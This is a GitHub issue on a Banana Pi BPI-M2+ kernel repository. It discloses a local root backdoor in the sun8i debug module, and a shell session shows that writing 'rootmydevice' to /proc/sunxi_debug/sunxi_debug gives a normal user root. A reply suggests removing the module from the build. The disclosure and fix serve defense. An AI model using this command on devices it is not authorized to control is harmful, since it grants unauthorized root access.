search

BPI-SINOVOIP / BPI-M2P-bsp

Supports BananaPi BPI -M2+ (Kernel 3.4)
12 stars 13 forks source link

Local privileges escalation on sun8i #1

Open ThomasKaiser opened 8 years ago

ThomasKaiser commented 8 years ago

Please check and fix

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
lifehome commented 7 years ago

Maybe try this to remove the debug module?

  1. Remove the file linux-sunxi/arch/arm/mach-sunxi/sunxi-debug.c;
  2. Modify the Makefile at linux-sunxi/arch/arm/mach-sunxi/Makefile, Line 52 change to obj-y += sys_config.o sunxi_dump_reg.o sunxi-chip.o sunxi_sram.o